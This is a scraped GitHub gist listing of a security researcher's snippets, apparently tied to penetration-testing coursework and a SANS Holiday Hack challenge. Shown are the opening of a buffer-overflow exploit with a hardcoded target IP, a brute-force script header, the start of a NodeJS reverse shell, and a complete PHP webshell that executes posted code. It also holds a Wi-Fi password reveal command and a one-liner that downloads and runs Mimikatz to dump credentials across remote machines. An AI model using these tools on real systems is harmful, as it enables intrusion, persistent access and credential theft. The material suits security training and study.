ahhh
/ embeddableclip.html
Created
January 16, 2016 07:31
— forked from skopp/embeddableclip.html
A simple way to embed gist into Blogger's dynamic view.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- to do: make this parse --> | |
| <div class="clipboardEmbedClip" data-clip-id="LQL1lDhsxPcZfc2h4vuk3E1MpI-5Xc_CPlqe" data-width="782" data-height="763" data-scale="disabled"> | |
| </div> | |
| <script type="text/javascript">(function() {if (!window.CLIPBOARD || !window.CLIPBOARD.widgets) {var elem = document.createElement("script");elem.type = "text/javascript";elem.async = true;elem.src = "//clipboard.com/js/widgets.js";var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(elem, s);}})(); | |
| </script> |
ahhh
/ Scan-Share-Permissions.ps1
Created
January 8, 2016 09:15
PowerShell Cmdlet for scanning groups or singular servers for shares and parsing their security control / access permissions and alerting on anonymous full control. scripted for the PowerShell for Penetration Testers certification and for embedding in the lockboxx blogpost: http://lockboxx.blogspot.com/2016/01/scan-share-permissions-powershell-f…
ahhh
/ pwn_sg5.py
Last active
January 8, 2016 09:11
Script used to exploit SG05, a sever vulnerable a buffer overflow in sgnetd during the SANS' Holiday Hack Challenge 2015,
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #/bin/python | |
| # Uses pwntools: https://github.com/Gallopsled/pwntools | |
| from pwn import * | |
| #TARGET_SERVER = "127.0.0.1" | |
| TARGET_SERVER = "54.233.105.81" | |
| TARGET_PORT = 4242 | |
| conn = remote(TARGET_SERVER, TARGET_PORT) | |
| # Jump box is at 192.241.XXX.XXX |
ahhh
/ Brute-Basic-Auth.ps1
Last active
February 23, 2022 11:44
PowerShell script for bruteforcing basic authentication of webservers, scripted for the PowerShell for Penetration Testers certification and for embedding in the lockboxx blogpost: http://lockboxx.blogspot.com/2016/01/brute-force-basic-authentication.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Powershell For Penetration Testers Exam Task 1 - Brute Force Basic Authentication Cmtlet | |
| function Brute-Basic-Auth | |
| { | |
| <# | |
| .SYNOPSIS | |
| PowerShell cmdlet for brute forcing basic authentication on web servers. | |
| .DESCRIPTION |
ahhh
/ rev_shell.js
Created
December 27, 2015 17:54
NodeJS Reverse Shell from https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var net = require('net'); | |
| var spawn = require('child_process').spawn; | |
| HOST="localhost"; | |
| PORT="1234"; | |
| TIMEOUT="5000"; | |
| function c(HOST,PORT) { | |
| var client = new net.Socket(); | |
| client.connect(PORT, HOST, function() { |
ahhh
/ add_cron.sh
Created
November 2, 2015 09:12
one liner to programmatically add commands to a crontab file, with the ability to deduplicate the command or time (using grep -v)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cc=”echo 'YOUR COMMANDS GO HERE'”;cj=”35 8 * * * $cc”; ( sudo crontab -l | grep -v "$cc" ; echo "$cj" ) | sudo crontab - |
ahhh
/ include_webshell.php
Created
October 31, 2015 02:58
A php url include webshell, inspired by: http://insecurety.net/?p=757
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| ini_set('allow_url_include, 1'); // Allow url inclusion in this script | |
| // No eval() calls, no system() calls, nothing normally seen as malicious. | |
| include('php://input'); | |
| ?> |
ahhh
/ epoch_to_date.py
Created
October 22, 2015 10:02
Unix datetime string to Python date time stamp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import datetime, sys | |
| print datetime.datetime.fromtimestamp(float(sys.argv[1])) |
ahhh
/ wireless_info.ps1
Created
August 19, 2015 01:34
PowerShell command to reveal wireless info including password on Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| netsh wlan show profiles name="the_name_of_your_network_profile" key=clear |
ahhh
/ mass_mimikatz.ps1
Created
July 24, 2015 21:07
Invoke-Mass-Mimikatz against an array of machines using PowerShell Remoting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')" |